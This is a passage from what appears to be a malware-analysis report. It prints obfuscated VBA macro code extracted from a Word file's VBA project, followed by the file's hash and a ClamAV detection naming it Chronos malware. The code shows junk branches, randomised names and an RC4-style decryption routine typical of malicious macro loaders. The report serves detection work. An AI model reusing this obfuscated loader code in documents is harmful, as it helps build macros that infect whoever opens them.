DuAjUZ88 = DuAjUZ88 + 1
If (DuAjUZ88 = PL6lLbh4GUYa) Then GoTo PL6lLbh4GUYa
BuOPR = 0
End If
Next
Next
PL6lLbh4GUYa:
LtW0A89oO = 0
For Ov8Y1m5gmV = 0 To (DuAjUZ88 - 1)
LtW0A89oO = LtW0A89oO Xor XcNXxg2kxIX(Ov8Y1m5gmV)
Next
ReDim Of59exs1YhnhN(0 To DuAjUZ88 - 1)
R4zDRCj9ZGX4 DuAjUZ88, VarPtr(Of59exs1YhnhN(0)), VarPtr(XcNXxg2kxIX(0))
End Sub
Private Function Ag9IiL(MmgWpAGifX As String) As String
Dim YeCJBkOZBWLC() As Byte
YeCJBkOZBWLC() = StrConv(MmgWpAGifX, vbFromUnicode)
Jxl7tQ1YA9KN YeCJBkOZBWLC, Len(MmgWpAGifX)
Ag9IiL = StrConv(YeCJBkOZBWLC(), vbUnicode)
End Function
Sub PRRs1ljB(XgXID() As Byte, Optional KixAs564I9l3DKAGZ As String)
Dim EgIRFZ74sE As Long, Kjnq8Nogfa60V As Long, OVSzE9ME4dL As Byte, ObJdTxG As Long, HqXMeu1 As Long, FAVk9j9zeI8Jpby As Long, S3tOyWlGDr(0 To 255) As Integer
If (Len(KixAs564I9l3DKAGZ) > 0) Then LW87K = KixAs564I9l3DKAGZ
R4zDRCj9ZGX4 512, VarPtr(S3tOyWlGDr(0)), VarPtr(TdzsHU(0))
HqXMeu1 = UBound(XgXID) + 1
FAVk9j9zeI8Jpby = HqXMeu1
For ObJdTxG = 0 To (HqXMeu1 - 1)
EgIRFZ74sE = (EgIRFZ74sE + 1) Mod 256
Kjnq8Nogfa60V = (Kjnq8Nogfa60V + S3tOyWlGDr(EgIRFZ74sE)) Mod 256
OVSzE9ME4dL = S3tOyWlGDr(EgIRFZ74sE)
S3tOyWlGDr(EgIRFZ74sE) = S3tOyWlGDr(Kjnq8Nogfa60V)
S3tOyWlGDr(Kjnq8Nogfa60V) = OVSzE9ME4dL
XgXID(ObJdTxG) = XgXID(ObJdTxG) Xor (S3tOyWlGDr((S3tOyWlGDr(EgIRFZ74sE) + S3tOyWlGDr(Kjnq8Nogfa60V)) Mod 256))
Next
End Sub
Private Function It8tuIaHe(Optional TAqbYS As String = "0123456789") As String
Dim JNSaIIa3l As Long, T6qStNR As Long
JNSaIIa3l = 93
T6qStNR = 45
If JNSaIIa3l + T6qStNR > 4 Then
T6qStNR = JNSaIIa3l + 62
Else
MsgBox 86
End If
Dim HllC5RIFCWNDao() As Byte, DEzfCewsHSuz() As Byte, XMEk1EBSTSe As Long, VIKsAaes As Long, QTyGjF5tBepjkfPQW As Long, YKO As String
Dim JGQmAwIBRyOKN As Long, V6SAciTjN4qcC70OG As Long
JGQmAwIBRyOKN = 53
V6SAciTjN4qcC70OG = 58
If JGQmAwIBRyOKN + V6SAciTjN4qcC70OG > 4 Then
V6SAciTjN4qcC70OG = JGQmAwIBRyOKN + 42
Else
MsgBox 90
End If
QTyGjF5tBepjkfPQW = 0
Dim Y34CWnUIr6hR As Long, TyyxxJbPu7CrY7R As Long
Y34CWnUIr6hR = 63
TyyxxJbPu7CrY7R = 26
If Y34CWnUIr6hR + TyyxxJbPu7CrY7R > 4 Then
TyyxxJbPu7CrY7R = Y34CWnUIr6hR + 38
Else
MsgBox 75
End If
Q78VnihvRytQyz:
Dim DWsz9Bhgrw As Long, VT8Hgf5vRSf As Long
DWsz9Bhgrw = 84
VT8Hgf5vRSf = 89
If DWsz9Bhgrw + VT8Hgf5vRSf > 4 Then
VT8Hgf5vRSf = DWsz9Bhgrw + 73
Else
MsgBox 22
End If
Randomize
YKO = Int(30 * Rnd)
If YKO < 4 Then GoTo Q78VnihvRytQyz
QTyGjF5tBepjkfPQW = YKO
If QTyGjF5tBepjkfPQW > 0& Then
Dim E5oRhNo1 As Long, EZDiW7VBlUm As Long
E5oRhNo1 = 73
EZDiW7VBlUm = 97
If E5oRhNo1 + EZDiW7VBlUm > 4 Then
EZDiW7VBlUm = E5oRhNo1 + 25
Else
MsgBox 89
End If
Randomize
HllC5RIFCWNDao = TAqbYS
Dim JNUP2VhCeQfhlk92 As Long, Y9vLsrcuEsX As Long
JNUP2VhCeQfhlk92 = 80
Y9vLsrcuEsX = 24
If JNUP2VhCeQfhlk92 + Y9vLsrcuEsX > 4 Then
Y9vLsrcuEsX = JNUP2VhCeQfhlk92 + 92
Else
MsgBox 13
End If
XMEk1EBSTSe = Len(TAqbYS) - 1&
QTyGjF5tBepjkfPQW = (QTyGjF5tBepjkfPQW * 2&) - 1&
Dim NWcjrD As Long, CP7xR7AXlL As Long
NWcjrD = 31
CP7xR7AXlL = 26
If NWcjrD + CP7xR7AXlL > 4 Then
CP7xR7AXlL = NWcjrD + 14
Else
MsgBox 49
End If
ReDim DEzfCewsHSuz(QTyGjF5tBepjkfPQW) As Byte
For VIKsAaes = 0& To QTyGjF5tBepjkfPQW Step 2&
DEzfCewsHSuz(VIKsAaes) = HllC5RIFCWNDao(CLng(XMEk1EBSTSe * Rnd) * 2&)
Next
Dim U8SISQvCAI1jnkP1l As Long, D7oapOIZFR9I As Long
U8SISQvCAI1jnkP1l = 75
D7oapOIZFR9I = 37
If U8SISQvCAI1jnkP1l + D7oapOIZFR9I > 4 Then
D7oapOIZFR9I = U8SISQvCAI1jnkP1l + 54
Else
MsgBox 55
End If
End If
Dim MW6t3PXYWtJP As Long, IIRu0dkIYOKJSU As Long
MW6t3PXYWtJP = 7
IIRu0dkIYOKJSU = 93
If MW6t3PXYWtJP + IIRu0dkIYOKJSU > 4 Then
IIRu0dkIYOKJSU = MW6t3PXYWtJP + 8
Else
MsgBox 66
End If
It8tuIaHe = DEzfCewsHSuz
Dim F3ZT0f As Long, QEQw13LL90U6 As Long
F3ZT0f = 80
QEQw13LL90U6 = 28
If F3ZT0f + QEQw13LL90U6 > 4 Then
QEQw13LL90U6 = F3ZT0f + 57
Else
MsgBox 43
End If
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 52736 bytes
SHA-256: b86624341bcc8f22c3985fcb573d5e2401c20a17095278543ae9276c365b71dc
Detection
ClamAV: Doc.Malware.Chronos-6897935-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.